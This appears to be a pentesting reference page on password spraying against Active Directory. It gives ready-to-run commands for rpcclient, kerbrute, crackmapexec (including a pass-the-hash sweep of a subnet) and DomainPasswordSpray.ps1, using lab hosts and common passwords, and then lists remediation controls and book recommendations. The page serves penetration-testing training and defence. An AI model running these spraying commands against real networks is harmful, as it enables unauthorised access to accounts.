Password Spray
Password Spraying Attacks - Tools
Start to identify valid users and check password policy
Users IdentificationPassword PolicyCustom Wordlist
LDAPWordListHarvester:
pyLDAPWordlistHarvester:
GeoWordlists
RPCclient
for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; doneKerbrute
kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt Welcome1CME
sudo crackmapexec smb 172.16.5.5 -u valid_users.txt -p Password123 | grep +crackmapexec smb 172.16.5.5 -u valid_users.txt -p Welcome1 --continue-on-successLogin equal password
cme smb 192.168.56.11 -u users.txt -p users.txt --no-bruteforce --continue-on-successLocal admin
sudo crackmapexec smb --local-auth 172.16.5.0/23 -u administrator -H 88ad09182de639ccc6579eb0849751cf | grep +SprayHound
CaptainCredz
Conpass- Continuous password spraying tool
Powershell - DomainPasswordSpray.ps1
PS C:\htb> Import-Module .\DomainPasswordSpray.ps1
PS C:\htb> Invoke-DomainPasswordSpray -Password Welcome1 -OutFile spray_success -ErrorAction SilentlyContinueSpray - Usernames
Remediation
The following security controls should be implemented to mitigate password spraying:
Create passwords for local administrator accounts, service accounts, and break glass accounts that are long (30-character minimum), unique, unpredictable and managed. Microsoft’s Local Administrator Password Solution (LAPS) can be used to achieve this for local administrator accounts. Using strong passwords reduces the likelihood of successful password spraying.
Create passwords used for single-factor authentication that consist of at least four random words with a total minimum length of 15-characters to reduce the likelihood of a successful password spraying.
Lock out user objects, except for break glass accounts, after a maximum of five failed logon attempts. Enforcing an account lock threshold after five failed authentication attempts reduces the number of possible attempts in password spraying.
Ensure passwords created for user objects are randomly generated, such as when a user object is created, or a user requests a password reset. Malicious actors will try to identify reused passwords and use these in password spraying to increase the likelihood of success.
Configure the built-in ‘Administrator’ domain account as sensitive to ensure it cannot be delegated.
Scan networks at least monthly to identify any credentials that are being stored in the clear. Malicious actors scan networks for cleartext credentials to use in password spraying. Locating and removing these cleartext credentials proactively mitigates this risk.
Disable the NTLM protocol. The NTLM protocol does not support MFA and can be misused by malicious actors to bypass MFA requirements.
Interesting Book
Interesting BooksPentesting Active Directory and Windows-based Infrastructure Enhance your skill set to pentest against real-world Microsoft infrastructure with hands-on exercises and by following attack/detect guidelines with OpSec considerations
Infrastructure Attack Strategies for Ethical Hacking Encompassing both external and internal enumeration techniques, the book delves into attacking routers and services, establishing footholds, privilege escalation, lateral movement, and exploiting databases and Active Directory.
RTFM: Red Team Field Manual v2 A quick reference when there is no time to scour the Internet for that perfect command
Red Team Development and Operations: A practical guide The authors have moved beyond SANS training and use this book to detail red team operations in a practical guide.
Cybersecurity Attacks – Red Team Strategies A practical guide to building a penetration testing program having homefield advantage
Support this Gitbook
I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.
Last updated